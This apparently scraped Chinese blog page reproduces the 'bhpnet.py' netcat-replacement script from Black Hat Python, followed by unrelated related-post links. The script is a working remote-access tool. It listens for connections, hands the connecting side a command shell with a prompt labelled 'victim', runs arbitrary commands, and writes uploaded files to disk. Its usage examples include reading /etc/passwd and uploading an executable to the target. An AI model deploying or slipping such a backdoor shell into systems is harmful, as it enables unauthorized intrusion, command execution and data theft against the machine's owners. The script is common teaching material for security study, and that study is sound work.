#!/opt/local/bin/python2.7
#coding=utf-8
'''
取代netcat
两台主机中其中一台控制另一台
得到北控方的shell
''' import sys
import socket
import getopt
import threading
import subprocess # 定义一些全局变量
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0 # this runs a command and returns the output
def run_command(command): # trim the newline
command = command.rstrip() # run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n" # send the output back to the client
return output # 这里会完成上传、执行shell命令、反弹shell的操作 控制方
def client_handler(client_socket):
global upload
global execute
global command # 检查是不是要求上传文件
if len(upload_destination): # read in all of the bytes and write to our destination
file_buffer = "" #持续接收数据
while True:
data = client_socket.recv(1024) if not data:
break
else:
file_buffer += data #将接收到的数据写到文件中
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close() # acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination) # 检查是不是要向目标发送shell语句
if len(execute): # run the command
output = run_command(execute) client_socket.send(output) # 检查是不是要得到目标的shell
if command: while True:
# show a simple prompt
client_socket.send("<受害者:#> ") # 接收返还的结果
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024) # we have a valid command so execute it and send back the results
response = run_command(cmd_buffer) # send back the response
client_socket.send(response) # this is for incoming connections
def server_loop():
global target
global port # if no target is defined we listen on all interfaces
if not len(target):
target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port)) server.listen(5) while True:
client_socket, addr = server.accept() # spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start() # if we don't listen we are a client....make it so.
def client_sender(buffer): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try:
# connect to our target host
client.connect((target,port)) # if we detect input from stdin send it
# if not we are going to wait for the user to punch some in if len(buffer): client.send(buffer) while True: # now wait for data back
recv_len = 1
response = "" while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data if recv_len < 4096:
break print response, # wait for more input
buffer = raw_input("")
buffer += "\n" # send it off
client.send(buffer) except:
# just catch generic errors - you can do your homework to beef this up
print "[*] Exception! Exiting." # teardown the connection
client.close() # 列出一些标签
def usage():
print "Netcat Replacement"
print
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print
print
print "Examples: "
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit(0) def main(): '''
引用全局变量
:return:
'''
global listen
global port
global execute
global command
global upload_destination
global target '''
检查是否输入了参数
'''
if not len(sys.argv[1:]):
usage() # 接收控制参数
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage() for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option" # 检查是不是控制方,并且参数有没有输入 # 如果是被控方
if not listen and len(target) and port > 0: '''
read in the buffer from the commandline
this will block, so send CTRL-D if not sending input
to stdin
''' buffer = sys.stdin.read() '''
开始向被控方发送指令
send data off
'''
client_sender(buffer) '''
如果是控制方
we are going to listen and potentially
upload things, execute commands and drop a shell back
depending on our command line options above
'''
if listen:
# 执行
server_loop() if __name__ == '__main__':
main()

socket | netcat 模拟的更多相关文章

  1. 使用PHP Socket 编程模拟Http post和get请求

    这里给大家分享一段使用PHP Socket 编程模拟Http post和get请求的代码,非常的实用,结尾部分我们再讨论下php模拟http请求的几种方法. <?php /** * 使用PHP ...

  2. 编写Java程序,使用 Socket类模拟用户加入 QQ 群时,QQ 小冰发送欢迎消息的场景(用户充当客户端,QQ 小冰充当服务端)

    查看本章节 查看作业目录 需求说明: 小冰是微软公司研发的人工智能机器人,被腾讯公司加入 QQ 群后,立即受到千万网友的喜爱.现在使用 Socket类模拟用户加入 QQ 群时,QQ 小冰发送欢迎消息的 ...

  3. fsockopen以Socket方式模拟HTTP下载文件

    fsockopen 的功能很强大,比如前面模拟 HTTP 访问,模拟 POST/GET 请求,什么的,这里再举一个例子,那就是下载东西.比如下载 http://www.nowamagic.net//l ...

  4. C语言:socket简单模拟http请求

    #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <netine ...

  5. socket本地模拟UDP 服务器+客户端(三)

    UDP: TCP是建立可靠连接,并且通信双方都可以以流的形式发送数据.相对TCP,UDP则是面向无连接的协议. 使用UDP协议时,不需要建立连接,只需要知道对方的IP地址和端口号,就可以直接发数据包. ...

  6. socket本地模拟TCP 服务器+客户端(二)

    建立两个py文件,分别打开两个cmd界面,即可进行通信.服务器端运用多进程,连续不断的处理从客户端接收到的数据:客户端通过一个list不断给客户端发送数据. (每个连接都必须创建新线程(或进程)来处理 ...

  7. socket编程模拟linux下的ssh代码实现

    实现思路: 1.提供输入指令的客户端: 2.提供返回执行指令结果的服务端 3.寻找服务端返回结果一次无法全部接收的解决思路 服务端代码(ssh_server.py) #coding=utf-8 imp ...

  8. Socket编程之Tomcat模拟_采坑汇总

    用java.net.Socket来模拟实现Tomcat,碰到了一些坑,大部分是没有想到的,记录下来自查. 直接上代码, public class TomcatDemo { private static ...

  9. 第一篇 先用socket模拟web服务器

    一.用socket来模拟网站访问 socket为python2.7 #!/usr/bin/env python # -*- coding:utf-8 -*- import socket def han ...

随机推荐

  1. linux sed如何锁定某一行数据进行替换

  2. vue的概述

    一.Vue的概述 Vue的开发模式 和 之前接触的jQuery.原生JSDOM操作是不同的,之前要想修改试图,首先找元素:在使用Vue时,专心把精力放在修改数据.DOM驱动 ---> 数据驱动. ...

  3. poj1065Wooden Sticks(dp——最长递减数列)

    Description There is a pile of n wooden sticks. The length and weight of each stick are known in adv ...

  4. ALDS1_1_3_D Areas on the Cross-Section Diagram 遇见了几个有意思的语法问题

    Your task is to simulate a flood damage. For a given cross-section diagram, reports areas of flooded ...

  5. Oracle简单学习

    最近一段时间重温了oracle关于存储过程和oracle包以及function中的定义, 先看一下要用的表: devices(id number, name varchar2, age number) ...

  6. Java thread(4)

    这一块主要是讨论关于进程同步的相关问题,主要是考虑一下的关键字:锁对象.条件对象 -> synchronized wait() notify(). 1.关于锁对象与条件对象: 所对象的定义在ja ...

  7. Web控件LinkButton

    <asp:LinkButton ID="" runat="server" ></asp:LinkButton> 编译后就变成了回发事件 ...

  8. tp5.1 phpspreadsheet- 工具类 导入导出(整合优化,非原创,抄一抄,加了一些自己的东西,)

    phpspreadsheet-工具类 导入导出(整合优化,非原创,抄一抄,加了一些自己的东西)1. composer require phpoffice/phpspreadsheet2. 看最下面的两 ...

  9. phpcms批量更新内容页只更新一点就返回问题

    phpcms批量更新内容页只更新一点就返回问题 给caches目录增加写入权限

  10. C# Base64编码解码 ,Md5、Rsa加密解密

    using System; using System.IO; using System.Security.Cryptography; using System.Text; namespace Clas ...